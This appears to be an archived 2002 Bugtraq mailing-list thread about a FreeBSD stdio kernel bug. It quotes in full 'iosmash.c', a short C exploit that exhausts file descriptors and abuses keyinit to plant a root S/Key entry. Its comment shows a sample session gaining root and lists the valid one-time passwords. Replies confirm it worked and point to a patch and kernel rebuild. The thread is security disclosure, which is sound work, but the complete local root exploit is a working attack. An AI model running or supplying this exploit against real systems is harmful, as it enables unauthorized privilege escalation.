Re: cheers

From: Onie Camara (neil@restricted.dyndns.org)
Date: 04/25/02


From: "Onie Camara" <neil@restricted.dyndns.org>
To: "zeno" <bugtraq@cgisecurity.net>
Date: Wed, 24 Apr 2002 23:01:57 -0500

Thanks. This is what I did to one of my client's freebsd. Patch actually
complained. It asked me to reverse. :-)

----- Original Message -----
From: "zeno" <bugtraq@cgisecurity.net>
To: "Onie Camara" <neil@restricted.dyndns.org>
Cc: "KF" <dotslash@snosoft.com>; "bugtraq" <bugtraq@securityfocus.org>;
"vuln-dev" <vuln-dev@security-focus.com>
Sent: Wednesday, April 24, 2002 3:58 PM
Subject: Re: cheers

> >
> > Even on my FreeBSD 4.5 STABLE, I got root access. This is terrifying.
:-)
> >
> > So any solutions?
>
> cvsup new source rebuild kernel. A patch is out already.
>
> - zeno@cgisecurity.com
>
> >
> > ----- Original Message -----
> > From: "KF" <dotslash@snosoft.com>
> > To: "bugtraq" <bugtraq@securityfocus.org>; "vuln-dev"
> > <vuln-dev@security-focus.com>
> > Sent: Tuesday, April 23, 2002 1:24 AM
> > Subject: cheers
> >
> >
> > > http://www.phased.home.ro/iosmash.c
> > >
> > > -KF
> > >
> > >
> >
> >
>
> --------------------------------------------------------------------------

--
> > ----
> >
> >
> > >
> > > /*
> > >   phased/b10z
> > >   phased@snosoft.com
> > >   23/04/2002
> > >
> > >   stdio kernel bug in All releases of FreeBSD up to and including
> > 4.5-RELEASE
> > >   decided to make a trivial exploit to easily get root :)
> > >
> > >   > id
> > >   uid=1003(phased) gid=999(phased) groups=999(phased)
> > >   > ./iosmash
> > >   Adding phased:
> > >   <--- HIT CTRL-C --->
> > >   > su
> > >   s/key 98 snosoft2
> > >   Password:MASS OAT ROLL TOOL AGO CAM
> > >   xes#
> > >
> > >   this program makes the following skeys valid
> > >
> > >   95: CARE LIVE CARD LOFT CHIC HILL
> > >   96: TESS OIL WELD DUD MUTE KIT
> > >   97: DADE BED DRY JAW GRAB NOV
> > >   98: MASS OAT ROLL TOOL AGO CAM
> > >   99: DARK LEW JOLT JIVE MOS WHO
> > >
> > >   http://www.snosoft.com
> > >   cheers Joost Pol
> > > */
> > >
> > > #include <stdio.h>
> > > #include <unistd.h>
> > >
> > > int main(int argc, char *argv[]) {
> > > while(dup(1) != -1);
> > > close(2);
> > > execl("/usr/bin/keyinit",
> > > "\nroot 0099 snosoft2 6f648e8bd0e2988a     Apr 23,2666 01:02:03\n");
> > > }
> > >
> > >
> >
> >
>
>